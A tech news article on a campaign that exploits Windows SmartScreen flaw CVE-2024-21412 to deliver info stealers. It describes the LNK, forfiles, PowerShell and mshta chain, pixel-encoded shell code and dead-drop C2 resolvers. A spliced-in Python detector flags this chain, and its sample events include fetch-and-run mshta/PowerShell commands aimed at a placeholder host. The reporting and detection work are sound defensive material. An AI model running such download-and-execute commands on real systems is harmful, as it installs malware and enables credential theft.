SmartScreen flaw exploited to drop malware in USA, Spain, Thailand

Several threat actors have exploited the CVE-2024-21412 vulnerability within the Windows SmartScreen feature to deliver info stealers such as Lumma, ACR and Meduza Stealer in Thailand, Spain, and the United States.

According to researchers, the attack begins with victims being tricked into clicking on a crafted link. This link directs them to a URL file, which downloads an LNK file. This LNK file is instrumental, as it downloads an executable file containing a hidden HTA script.

Upon execution, this script decodes and decrypts PowerShell code, retrieving additional malicious components, including decoy PDF files and a shell code injector.

“Initially, attackers lure victims into clicking a crafted link to a URL file designed to download an LNK file. The LNK file then downloads an executable file containing an HTA script. Once executed, the script decodes and decrypts PowerShell code to retrieve the final URLs, decoy PDF files, and a malicious shell code injector,” researchers said.

Researchers observed that the threat actors designed the infection process meticulously. The initial LNK file uses the ‘forfiles’ command to invoke PowerShell, which in turn executes ‘mshta’ to fetch an executable from a remote server. Once the HTA script runs, it minimises its windows and avoids taskbar visibility, staying under the radar while it carries out further malicious actions.
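The forfiles-to-PowerShell-to-mshta chain described above is a detection opportunity in endpoint telemetry. The following is an added example, not code from the article or from Fortinet: it walks Sysmon-style process-creation events (field names and the sample events are constructed) and flags PowerShell spawned under forfiles.exe and mshta.exe pulling a remote HTA, while leaving a benign administrative use of forfiles alone.

```python
import re
from typing import Dict, List

# Constructed sample telemetry shaped like Sysmon process-creation events (EventID 1).
# pids 101-104 model the chain from the article; pid 200 is a benign forfiles cleanup job.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 4,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\forfiles.exe",
     "cmd": "forfiles ... /c \"powershell -w hidden ...\""},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd /c powershell -w hidden ..."},
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -c mshta http://placeholder.invalid/stage.hta"},
    {"pid": 104, "ppid": 103, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta http://placeholder.invalid/stage.hta"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\forfiles.exe",
     "cmd": "forfiles /p C:\\logs /d -30 /c \"cmd /c del @path\""},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
MAX_DEPTH = 8  # bound the ancestor walk so malformed trees cannot loop forever


def _basename(event: Dict) -> str:
    return event["image"].rsplit("\\", 1)[-1].lower()


def _ancestor_names(event: Dict, by_pid: Dict[int, Dict]) -> List[str]:
    names, cur = [], event
    for _ in range(MAX_DEPTH):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            break
        names.append(_basename(cur))
    return names


def find_suspicious_chains(events: List[Dict]) -> List[str]:
    """Return one alert string per event matching the LNK -> forfiles -> PowerShell -> mshta pattern."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = _basename(e)
        # forfiles.exe is a LOLBin; PowerShell anywhere beneath it is rarely legitimate.
        if name == "powershell.exe" and "forfiles.exe" in _ancestor_names(e, by_pid):
            alerts.append(f"pid {e['pid']}: PowerShell launched under forfiles.exe")
        # mshta.exe fetching an HTA over HTTP(S) matches the remote-stage download in this campaign.
        if name == "mshta.exe" and REMOTE_URL.search(e["cmd"]):
            alerts.append(f"pid {e['pid']}: mshta.exe loading remote HTA: {e['cmd']}")
    return alerts
```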

The attackers have tailored their approach to different regions, including North America, Spain, and Thailand, by using various PDF files as decoys. These files distract the victim while the real malicious activities occur in the background.

Figure: Attack methodology. | Source: Fortinet

Researchers have observed two types of injectors in the campaign: one using image files to obtain shell code and another employing direct shell code injection techniques.

The first injector variant downloads a PNG file from the Imghippo image-hosting website and uses the ‘GdipBitmapGetPixel’ Windows API to decode shell code from the image pixels, then calls a series of Windows API functions to inject it. The second variant decrypts its code directly from its data section and uses several Windows API calls to inject the shell code, a simpler but still effective approach.

The ultimate goal of this campaign is to deploy stealer malware such as Meduza Stealer version 2.9 and ACR Stealer. These stealers target a wide range of applications, including browsers, crypto wallets, messaging apps, FTP clients, email clients, VPN services, and password managers.

Figure: Meduza Stealer panel. | Source: Fortinet

The Meduza Stealer communicates with its command and control (C2) server, hidden using techniques like dead drop resolvers (DDR) on legitimate platforms such as the Steam community website.

By embedding C2 server information within seemingly harmless community profiles, the stealer can maintain communication with its operators and fetch configuration data crucial for its operation. This data includes target specifics and operational parameters, allowing the malware to adapt and continue its malicious activities undetected.

Researchers have urged users to implement robust security measures and to continuously monitor their digital assets. Users are also advised to exercise caution when downloading files from unofficial sources.

“This campaign primarily targets CVE-2024-21412 to spread LNK files for downloading execution files that embed HTA script code within their overlays. The HTA script runs silently, avoiding any pop-up windows, and clandestinely downloads two files: a decoy PDF and an execution file designed to inject shell code, setting the stage for the final stealers,” researchers concluded.

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me